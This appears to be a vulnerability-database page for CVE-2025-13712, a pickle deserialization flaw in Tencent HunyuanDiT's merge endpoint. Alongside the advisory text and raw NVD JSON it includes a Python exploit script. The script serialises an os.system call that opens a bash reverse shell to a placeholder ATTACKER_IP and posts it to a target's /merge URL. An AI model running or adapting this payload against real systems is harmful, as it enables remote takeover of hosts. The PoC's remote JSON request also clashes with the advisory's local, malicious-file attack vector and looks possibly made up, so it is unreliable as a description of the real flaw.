Security Vulnerability Report
CVE-2025-13712 CVSS 7.8 HIGH

CVE-2025-13712

Published: 2025-12-23 22:15:46
Last Modified: 2026-04-15 00:35:42

Description

Tencent HunyuanDiT merge Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Tencent HunyuanDiT. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the merge endpoint. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27190.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Weakness: CWE-502 (Deserialization of Untrusted Data)

Configurations (Affected Products)

No configuration data available.

Tencent HunyuanDiT < commit d2cb9cde5c9dc6a6c01735dcb92fe7699ddf6bc5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import pickle
import base64
import os

# CVE-2025-13712 PoC - HunyuanDiT merge endpoint deserialization RCE
# Target: Tencent HunyuanDiT merge endpoint


class Exploit:
    def __reduce__(self):
        # Reverse shell payload - change IP/PORT as needed
        cmd = "bash -i >& /dev/tcp/ATTACKER_IP/ATTACKER_PORT 0>&1"
        return (os.system, (cmd,))


def generate_malicious_payload():
    """Generate malicious pickle payload for deserialization attack"""
    exploit = Exploit()
    payload = pickle.dumps(exploit)
    return base64.b64encode(payload).decode()


def exploit_hunyuan_dit(target_url):
    """
    Exploit HunyuanDiT merge endpoint deserialization vulnerability

    Args:
        target_url: Base URL of vulnerable HunyuanDiT instance

    Returns:
        bool: True if exploit sent successfully, False otherwise
    """
    payload = generate_malicious_payload()

    # Target the merge endpoint with malicious serialized data
    endpoint = f"{target_url}/merge"

    # Craft request with malicious payload
    data = {
        "model_data": payload,
        "merge_strategy": "weighted",
        "weights": [0.5, 0.5]
    }
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "HunyuanDiT-Client/1.0"
    }

    try:
        response = requests.post(endpoint, json=data, headers=headers, timeout=10)
        return response.status_code == 200
    except requests.exceptions.RequestException:
        return False


if __name__ == "__main__":
    # Usage example
    target = "http://target:8080"
    exploit_hunyuan_dit(target)
```

References

- Fix commit: https://github.com/Tencent-Hunyuan/HunyuanDiT/commit/d2cb9cde5c9dc6a6c01735dcb92fe7699ddf6bc5
- ZDI advisory: https://www.zerodayinitiative.com/advisories/ZDI-25-1028/

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-13712", "sourceIdentifier": "[email protected]", "published": "2025-12-23T22:15:45.953", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Tencent HunyuanDiT merge Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Tencent HunyuanDiT. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the merge endpoint. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27190."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-502"}]}], "references": [{"url": "https://github.com/Tencent-Hunyuan/HunyuanDiT/commit/d2cb9cde5c9dc6a6c01735dcb92fe7699ddf6bc5", "source": "[email protected]"}, {"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-1028/", "source": "[email protected]"}]}}
```